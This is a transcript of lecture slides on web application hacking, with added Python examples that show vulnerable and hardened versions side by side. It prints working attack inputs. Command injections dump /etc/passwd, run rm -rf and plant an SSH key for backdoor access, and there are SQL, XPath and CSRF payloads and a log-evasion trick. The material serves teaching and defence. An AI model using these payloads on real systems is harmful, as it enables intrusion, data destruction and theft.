Mike Gerschefske

Jan 02, 2016

Transcript
Page 1: Mike Gerschefske. Hacking is illegal (most of the time)  Understand the laws  Port Scanning can be considered illegal  Post 9/11 can be act of terrorism.

Mike Gerschefske

Page 2:

Hacking is illegal (most of the time)
Understand the laws
Port scanning can be considered illegal
Post 9/11 it can be treated as an act of terrorism
DMCA exceptions: educational learning (at an institution)

Page 3:

Who cares about web hacking?
The days of buffer overflows and root boxes are nearing an end…
Non-executable stacks
People patching their systems
Everything is turning into a web system

Page 4:

Power of Google
Google knows all: SSNs, credit card numbers, back-end SQL
Google Hacking Database: http://johnny.ihackstuff.com/ghdb.php
Example dork: intitle:snc-rz30 inurl:home/
robots.txt: don't put secrets in here (it tells a crawler, and an attacker, exactly where not to look)

Page 5:

Power of the web browser
Is capable of HTTP GET/POST, and of sending any kind of GET/POST
Doesn't have to run client-side code (i.e. JavaScript)
Can send anything it wants to
Can be bad: a URL such as http://somesite/index.php?section=Admin, where editing the parameter gives vertical escalation

Page 6:

Bad Code = Bad Security
You are not able to control the client end: cookies, POSTs, GETs, session IDs, all data
Do not put the user level (admin, user, etc.) in them: vertical escalation
Do not put the user id in them: horizontal escalation

Page 7:

The Infamous Museum Example! Command Injection
Tools: vi, PuTTY, PuTTYgen, Firefox

Page 8:

Museum Example: code from two [n] years ago (elided parts are marked …):

```perl
#!/usr/bin/perl
…
$first = param('first');
$last = param('last');
$password = param('password');
…
# In Perl, ! binds tighter than eq, so the last clause reads (!$password) eq "unbreakable",
# which is never true: the password is not actually checked at all.
if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {
    print "<p>Could not understand or wrong password!!</p>";
}
else {
    # user input goes straight into a shell command line
    system "cat ./museum_ideas/${first}.${last}";
    …
```

Page 9:

Some Good Combinations

Dump the password file:
First Name: .
Last Name : /../../../../etc/passwd
Password  : unbreakable
(the "." first name plus the "." separator make the command cat ./museum_ideas/../../../../../etc/passwd)

Delete the whole directory:
First Name: NOTEMPTY
Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
Password  : unbreakable
(the shell sees cat ./museum_ideas/NOTEMPTY.& rm -rf …, i.e. two commands)
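As an added example (not the slide's code), here is the museum CGI rendered in Python, vulnerable and hardened side by side, run against the two payloads above. Only the museum_ideas directory name and the password come from the slides; the function names, the name allowlist and the sample idea file are assumptions made for this example.

```python
import hmac
import re
import subprocess
import tempfile
from pathlib import Path

PASSWORD = "unbreakable"
NAME_RE = re.compile(r"[A-Za-z][A-Za-z'-]{0,39}")  # assumed policy: letters, apostrophe, hyphen


def vulnerable_command(first: str, last: str) -> str:
    """The shell command line the slide's system "cat ./museum_ideas/${first}.${last}"
    builds. Returned, not executed: this string is the injection point."""
    return f"cat ./museum_ideas/{first}.{last}"


def hardened_lookup(first: str, last: str, password: str, base_dir: Path) -> bytes:
    """Serve an idea file without handing user input to a shell.

    Raises ValueError on any bad input so the caller can print one generic error.
    """
    # Constant-time compare; a plain != leaks how many leading bytes matched.
    if not hmac.compare_digest(password.encode(), PASSWORD.encode()):
        raise ValueError("wrong password")
    # Allowlist, not a denylist: "." and "& rm -rf ..." both fail here.
    if not (NAME_RE.fullmatch(first) and NAME_RE.fullmatch(last)):
        raise ValueError("name contains characters outside the allowlist")
    base = base_dir.resolve()
    target = (base / f"{first}.{last}").resolve()
    # Containment check as a second layer: a later change to NAME_RE must not
    # be able to bring back ../../../../etc/passwd.
    if base not in target.parents:
        raise ValueError("path escapes the ideas directory")
    if not target.is_file():
        raise ValueError("no such idea")
    # argv list with shell=False: cat receives the path as one argument and no
    # shell ever parses it, so & ; | and $() carry no meaning.
    return subprocess.run(["cat", str(target)], capture_output=True, check=True).stdout


def demo() -> dict:
    """Run both versions against the slide's two payloads and a legitimate name."""
    dump_pw = (".", "/../../../../etc/passwd")
    rm_rf = ("NOTEMPTY", "& rm -rf /home/museum/public_html/cgi_bin/museum_ideas")
    results = {"commands": [vulnerable_command(*dump_pw), vulnerable_command(*rm_rf)]}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "Ada.Lovelace").write_bytes(b"analytical engine\n")  # constructed sample idea
        results["legit"] = hardened_lookup("Ada", "Lovelace", PASSWORD, base)
        rejected = []
        for first, last in (dump_pw, rm_rf):
            try:
                hardened_lookup(first, last, PASSWORD, base)
                rejected.append(False)
            except ValueError:
                rejected.append(True)
        results["rejected"] = rejected
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The allowlist alone would stop both payloads; the containment check is there so that a future "let names contain dots" change does not silently reopen the traversal.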

Page 10:

SSH RSA Example
Generate a key pair with PuTTYgen, then inject:
& mkdir /home/museum/.ssh & echo "ssh-rsa PUB-KEY" > /home/museum/.ssh/authorized_keys2
NO SPACES!
(authorized_keys holds the public half of the pair; the private key stays on the attacker's side in PuTTY)

Page 11:

Museum on Athena!
An example write-up: http://athena.uccs.edu/ictf/index.php/Museum

Page 12:

Command Injection
This is the basic idea of command injection
Security through obscurity sometimes works
Some people are very diligent

Page 13:

SQL Injections
We can send commands, why not SQL?
What is SQL?
What can we do with SQL?
Get any data we want (that the database user has access to)
Delete all the data the user has access to
If the user is root, dump the database
If the user is root, can upload and execute Java/C from the database and root the box

Page 14:

Another Example
http://128.198.60.73/~contribute/cgi-bin/history.py

```python
query = "SELECT * FROM contributors where name=\"%s\" ;" % ( form.getvalue("name") )
```

Value sent for name:

" or "1" = "1

Page 15:

How to protect against it? Check parameters?
Not really…
Need to use SQL parameterization whenever at all possible
Mark strings as strings, ints as ints
SELECT * WHERE name = @ (the @ is a bound parameter, not text pasted into the query)
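As an added example (not the slide's history.py), the same query built both ways against a constructed in-memory SQLite table. SQLite quotes string literals with single quotes, so the slide's MySQL-style payload " or "1" = "1 becomes ' or '1' = '1; the table, rows and function names are assumptions made here.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contributors (name TEXT, amount INTEGER)")
    conn.executemany("INSERT INTO contributors VALUES (?, ?)",
                     [("alice", 100), ("bob", 250), ("carol", 75)])  # constructed rows
    return conn


def vulnerable_history(conn: sqlite3.Connection, name: str) -> list:
    """Same construction as the slide: the value is pasted into the SQL text,
    so a quote inside the value changes the shape of the statement."""
    query = "SELECT * FROM contributors WHERE name='%s' ;" % (name,)
    return conn.execute(query).fetchall()


def parameterized_history(conn: sqlite3.Connection, name: str) -> list:
    """The SQL text is fixed; the value travels separately and is always a string."""
    return conn.execute("SELECT * FROM contributors WHERE name = ?", (name,)).fetchall()


def parameterized_over(conn: sqlite3.Connection, minimum) -> list:
    """Ints as ints: int() rejects '0 OR 1=1' before it gets near the query."""
    return conn.execute("SELECT name FROM contributors WHERE amount > ?",
                        (int(minimum),)).fetchall()


def demo() -> dict:
    conn = make_db()
    payload = "' or '1' = '1"
    try:
        parameterized_over(conn, "0 OR 1=1")
        over_rejected = False
    except ValueError:
        over_rejected = True
    return {
        "legit": vulnerable_history(conn, "bob"),
        "injected": vulnerable_history(conn, payload),
        "param_legit": parameterized_history(conn, "bob"),
        "param_injected": parameterized_history(conn, payload),
        "over_100": parameterized_over(conn, "100"),
        "over_rejected": over_rejected,
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key}: {rows}")
```

With the payload the vulnerable statement reads SELECT * FROM contributors WHERE name='' or '1' = '1' ; and returns every row; the parameterized version looks for a contributor literally named ' or '1' = '1 and returns nothing.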

Page 16:

Why doesn't checking params work?
If you're really smart it will, but if you don't understand the problem it won't
This is a very difficult problem to understand
Example: http://viva/ictf/index.php/SQL_Injection
The problem is that the ' (apostrophe) is a special character
To fix it, we just find and replace all apostrophes with two '' as that's how we insert apostrophes in a string… NO!

Page 17:

Second Level (second-order) SQL Injection
The problem actually isn't solved, just more complicated
Take:
Username = ' OR 'a' = 'a
After doubling the apostrophes the query is well-formed and stores the value as typed:
SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

Page 18:

Goes in fine, but coming out…
Get the username from the DB and put it in a variable
The variable contains SQL
We TRUST the DB to give us good data
Create another SQL query from it, and the second one is now vulnerable:
SELECT content FROM database WHERE username = VUNSQL
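As an added example (not from the slides), the second-order case end to end: the first query is "fixed" with the quote doubling from page 16, the raw value is stored, and a second query built from the stored value runs the injection. Tables, rows and function names are constructed for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT)")
    conn.execute("CREATE TABLE content (username TEXT, body TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)",
                     [("alice", "alice's diary"), ("bob", "bob's diary")])  # constructed rows
    return conn


def double_quotes(value: str) -> str:
    """The page-16 'fix': every ' becomes '' so it parses as a literal quote."""
    return value.replace("'", "''")


def register(conn: sqlite3.Connection, username: str) -> int:
    """First query. Escaping makes it parse correctly, and the raw value is stored."""
    cur = conn.execute("INSERT INTO users (username) VALUES ('%s')" % double_quotes(username))
    return cur.lastrowid


def stored_username(conn: sqlite3.Connection, user_id: int) -> str:
    return conn.execute("SELECT username FROM users WHERE rowid = ?", (user_id,)).fetchone()[0]


def content_vulnerable(conn: sqlite3.Connection, user_id: int) -> list:
    """Second query. The value came from our own database, so it is 'trusted'
    and pasted in unescaped; the stored ' OR 'a' = 'a now runs as SQL."""
    username = stored_username(conn, user_id)
    query = "SELECT body FROM content WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(query).fetchall()]


def content_parameterized(conn: sqlite3.Connection, user_id: int) -> list:
    """Bind the value wherever it is used, regardless of where it came from."""
    username = stored_username(conn, user_id)
    rows = conn.execute("SELECT body FROM content WHERE username = ?", (username,))
    return [row[0] for row in rows.fetchall()]


def demo() -> dict:
    conn = make_db()
    evil_id = register(conn, "' OR 'a' = 'a")
    return {
        "stored": stored_username(conn, evil_id),
        "vulnerable": content_vulnerable(conn, evil_id),
        "parameterized": content_parameterized(conn, evil_id),
    }


if __name__ == "__main__":
    print(demo())
```

The INSERT that runs is VALUES (''' OR ''a'' = ''a'), exactly the shape shown on page 17; the second query becomes SELECT body FROM content WHERE username = '' OR 'a' = 'a' and returns every user's content. The fix is not "escape harder" but binding the parameter at every use.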

Page 19:

XSS – Cross Site Scripting
Malicious injection of JavaScript
Cookie hijacking
MySpace – replicate itself, add friends
Samy – oh wait, some CSRF too (oops): http://web.archive.org/web/20060208182348/namb.la/popular/tech.html

```html
<script>document.write("<img src=http://site.com/a.jpg>");</script>
```

Page 20:

CSRF – Cross-Site Request Forgery
Alice logs into www.bank.com in tab A
Alice goes to www.google.com, which has an advertisement that contains JS
Code in the ad:

```html
<script>document.write("<img src=www.bank.com/transfer?DEST=Mallory&Amount=1000>");</script>
```

The browser fetches the "image" with Alice's bank cookies attached, so the transfer runs as Alice.
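As an added example (not from the slides), the transfer endpoint above as a plain Python handler, first as the slide describes it and then with the usual CSRF defences. The request dict stands in for what a web framework would parse; the session id, server key, balances and function names are constructed for this example.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)          # assumed server-side secret
SESSIONS = {"s3ss10n-alice": "Alice"}         # constructed session table


def csrf_token(session_id: str) -> str:
    """Token bound to the session, so one session's token is useless for another."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(request: dict, balances: dict) -> int:
    """The slide's endpoint: any request carrying Alice's cookie moves money,
    including an <img src=...> fetch triggered from another site."""
    user = SESSIONS.get(request["cookies"].get("session"))
    if user is None:
        return 401
    dest, amount = request["params"]["DEST"], int(request["params"]["Amount"])
    balances[user] -= amount
    balances[dest] = balances.get(dest, 0) + amount
    return 200


def transfer_hardened(request: dict, balances: dict) -> int:
    session_id = request["cookies"].get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return 401
    # State changes only via POST: an <img> or a link can only make GETs.
    if request["method"] != "POST":
        return 405
    # Browsers add Origin to cross-site POSTs and a third-party page cannot forge it.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != "https://www.bank.com":
        return 403
    # Synchronizer token: the attacker's page cannot read it out of bank.com
    # (same-origin policy), so it cannot include it in a forged request.
    if not hmac.compare_digest(request["params"].get("csrf", ""), csrf_token(session_id)):
        return 403
    dest, amount = request["params"]["DEST"], int(request["params"]["Amount"])
    balances[user] -= amount
    balances[dest] = balances.get(dest, 0) + amount
    return 200


def demo() -> dict:
    # What the browser sends when the ad's <img> loads: a GET with Alice's
    # cookie attached automatically, no token, no Origin.
    forged = {"method": "GET", "cookies": {"session": "s3ss10n-alice"},
              "params": {"DEST": "Mallory", "Amount": "1000"}, "headers": {}}
    # A form auto-submitted from the attacker's page: POST, but wrong Origin, no token.
    forged_post = {**forged, "method": "POST", "headers": {"Origin": "https://www.google.com"}}
    legit = {"method": "POST", "cookies": {"session": "s3ss10n-alice"},
             "params": {"DEST": "Bob", "Amount": "50", "csrf": csrf_token("s3ss10n-alice")},
             "headers": {"Origin": "https://www.bank.com"}}
    out = {}
    b = {"Alice": 5000}
    out["vulnerable"] = (transfer_vulnerable(forged, b), dict(b))
    b = {"Alice": 5000}
    out["hardened_get"] = (transfer_hardened(forged, b), dict(b))
    out["hardened_post"] = (transfer_hardened(forged_post, b), dict(b))
    out["hardened_legit"] = (transfer_hardened(legit, b), dict(b))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Marking the session cookie SameSite=Lax (or Strict) keeps the browser from attaching it to cross-site subresource requests in the first place, but the token check is what protects clients and proxies that ignore that attribute.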

Page 21:

XPath Injection
//user[name/text() = '' or 1=1 or '' and password/text() = 'junk']
Used with: XML-RPC, SOAP/WSDL

Page 22:

Click Jacking…

Page 23:

IDS Will Find You
SQL/command injection is very easy to detect
IDSs are poor at handling packet fragmentation combined with timing tricks (evasion)

Page 24:

Profiling
Need to know what you're attacking; then you can search for exploits
Example: HEAD / HTTP/1.0 (banners and headers vary; everyone's a little different)
Nmap is a good profiler; Nessus will profile too

Page 25:

Tools
Add N Edit Cookies – Mozilla Firefox extension
TamperData – Firefox
Modify Headers – Firefox
Wget, Curl, Netcat/Telnet
Proxies: Paros Proxy – free; Fiddler – Microsoft, free; Spike – free

Page 26:

Timing Attacks
Breaking authentication: a wrong password for a real username may take x time, while a username that doesn't exist takes y time
There have been successful timing attacks against encryption
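As an added example (not from the slides), the username-enumeration leak described above: a login that returns early for unknown users beside one that does the same work on every path. User records, the decoy record and the PBKDF2 parameters are constructed for this example.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 50_000  # assumed work factor; high enough that the gap is measurable


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_users() -> dict:
    salt = os.urandom(16)
    return {"alice": (salt, hash_password("correct horse", salt))}  # constructed record


# Fixed decoy record so an unknown username still costs exactly one PBKDF2 run.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = hash_password("decoy-never-matches", DUMMY_SALT)


def login_vulnerable(users: dict, username: str, password: str, work: dict) -> bool:
    record = users.get(username)
    if record is None:
        return False          # fast path: no hashing at all, the x-vs-y gap from the slide
    salt, stored = record
    work["hashes"] += 1
    return hash_password(password, salt) == stored   # == also stops at the first differing byte


def login_hardened(users: dict, username: str, password: str, work: dict) -> bool:
    salt, stored = users.get(username, (DUMMY_SALT, DUMMY_HASH))
    work["hashes"] += 1                               # always exactly one hash
    candidate = hash_password(password, salt)
    matched = hmac.compare_digest(candidate, stored)  # constant-time compare
    return matched and username in users              # the decoy can never log in


def timed(fn, *args) -> float:
    start = time.perf_counter()
    fn(*args)
    return time.perf_counter() - start


def demo() -> dict:
    users = make_users()
    out = {}
    for name, fn in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        work_unknown, work_wrong = {"hashes": 0}, {"hashes": 0}
        out[name] = {
            "unknown_user": fn(users, "mallory", "guess", work_unknown),
            "wrong_password": fn(users, "alice", "guess", work_wrong),
            "right_password": fn(users, "alice", "correct horse", {"hashes": 0}),
            "hashes": (work_unknown["hashes"], work_wrong["hashes"]),
            "seconds": (timed(fn, users, "mallory", "guess", {"hashes": 0}),
                        timed(fn, users, "alice", "guess", {"hashes": 0})),
        }
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Run stand-alone, the "seconds" pair for the vulnerable login shows the unknown-user case finishing orders of magnitude faster than the wrong-password case; the hardened login's two timings are within noise of each other because both paths hash once and compare in constant time.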

Page 27:

Never ever ever roll your own encryption
Microsoft tried this – FAIL
Tea Party! ROT13, Base64, MD5

Page 28:

ASP.NET Exploit
Debugging (source code) only available to localhost
Bypass this check by sending the following:
GET http://localhost/bleh.asp?a=j HTTP/1.0
It checks the server name variable rather than the remote address
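As an added example (not from the slides), why the check above fails: an absolute-URI request line lets the client choose the host name the server records, while the peer address of the TCP connection does not. The WSGI-style environ dict, addresses and function names are constructed for this example.

```python
from urllib.parse import urlsplit


def parse_request_line(line: str, peer_ip: str, host_header: str = None) -> dict:
    """Fill the parts of environ the check cares about from a raw request line.
    HTTP/1.0 and 1.1 both allow an absolute URI as the request target."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    return {
        "REQUEST_METHOD": method,
        "HTTP_HOST": parts.netloc or host_header or "",   # client-controlled
        "PATH_INFO": parts.path,
        "QUERY_STRING": parts.query,
        "REMOTE_ADDR": peer_ip,                          # from the socket, not the request
    }


def is_local_by_name(environ: dict) -> bool:
    """The slide's bug: trusts the name the request carried."""
    return environ["HTTP_HOST"].split(":")[0] in ("localhost", "127.0.0.1")


def is_local_by_address(environ: dict) -> bool:
    """Decide on the peer address, which the client cannot choose."""
    return environ["REMOTE_ADDR"] in ("127.0.0.1", "::1")


def debug_page(environ: dict, check) -> int:
    """200 with source-level debug output, 403 otherwise (status only, for the demo)."""
    return 200 if check(environ) else 403


def demo() -> dict:
    remote = parse_request_line("GET http://localhost/bleh.asp?a=j HTTP/1.0", "203.0.113.9")
    local = parse_request_line("GET /bleh.asp?a=j HTTP/1.0", "127.0.0.1", host_header="localhost")
    return {
        "by_name": (debug_page(remote, is_local_by_name), debug_page(local, is_local_by_name)),
        "by_address": (debug_page(remote, is_local_by_address), debug_page(local, is_local_by_address)),
    }


if __name__ == "__main__":
    print(demo())
```

Behind a reverse proxy REMOTE_ADDR is the proxy's address, so the same check must then be made at the proxy (or on a trusted X-Forwarded-For set by that proxy only), never on a header the client can write.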

Page 29:

Mod_security

http://www.modsecurity.org/

Page 30:

Replay Attacks
Scorebot deletes flag; scorebot adds flag
Since the scorebot goes to everyone, we have the delete-and-add sequence
Can potentially replay the same delete sequence across all enemy servers

Page 31:

Log Evasion
Many logs only log ~4K of URL; usually they don't log POST contents
Prevents DoS from filling up the logs
If the payload sits past the 4K mark, the log won't contain the malicious payload
http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD
The application ignores the foo parameter; the log shows up as GET /page.asp …
Not just IIS: Sun One App Server too
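As an added example (not from the slides), the padding trick above against a logger that caps the URL, next to an application-side log line that records what the code actually consumed plus an oversized-URL flag. The 4096 cap, the log formats and the parameter names are assumptions made for this example.

```python
from urllib.parse import parse_qs, urlsplit

LOG_URL_LIMIT = 4096  # assumed server cap on logged request URLs


def evasive_url(payload: str, filler_len: int = LOG_URL_LIMIT) -> str:
    """Pad an ignored parameter so the interesting one sits past the cap."""
    return "/page.asp?foo=" + "A" * filler_len + "&payload=" + payload


def server_log_line(method: str, url: str, limit: int = LOG_URL_LIMIT) -> str:
    """What a web server that caps the request URL keeps."""
    return f"{method} {url[:limit]}"


def handle(url: str, known_params=("payload",)) -> dict:
    """The application only reads the parameters it knows; foo is never looked at."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: query.get(name, [""])[0] for name in known_params}


def app_log_line(method: str, url: str, limit: int = LOG_URL_LIMIT) -> str:
    """Log from inside the application: the consumed values, the full length,
    and a flag when the URL is longer than the server would have kept."""
    consumed = handle(url)
    fields = " ".join(f"{k}={v!r}" for k, v in consumed.items())
    flag = " oversized_url=1" if len(url) > limit else ""
    return f"{method} {urlsplit(url).path} {fields} len={len(url)}{flag}"


def demo() -> dict:
    url = evasive_url("MYPAYLOAD")
    return {
        "url_len": len(url),
        "server_log": server_log_line("GET", url),
        "app_log": app_log_line("GET", url),
        "consumed": handle(url),
    }


if __name__ == "__main__":
    r = demo()
    print(r["url_len"], r["server_log"][:60] + "...", r["app_log"], sep="\n")
```

The server line ends in a run of A's and never mentions MYPAYLOAD; the application line is short, carries the value that was actually used, and the length plus flag make padded requests stand out on their own, which is also the only way to get POST bodies into the record.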

Page 32:

OWASP – Top 10! (2007 edition)
A1 - Cross Site Scripting (XSS)
A2 - Injection Flaws
A3 - Malicious File Execution
A4 - Insecure Direct Object Reference
A5 - Cross Site Request Forgery (CSRF)
A6 - Information Leakage and Improper Error Handling
A7 - Broken Authentication and Session Management
A8 - Insecure Cryptographic Storage
A9 - Insecure Communications
A10 - Failure to Restrict URL Access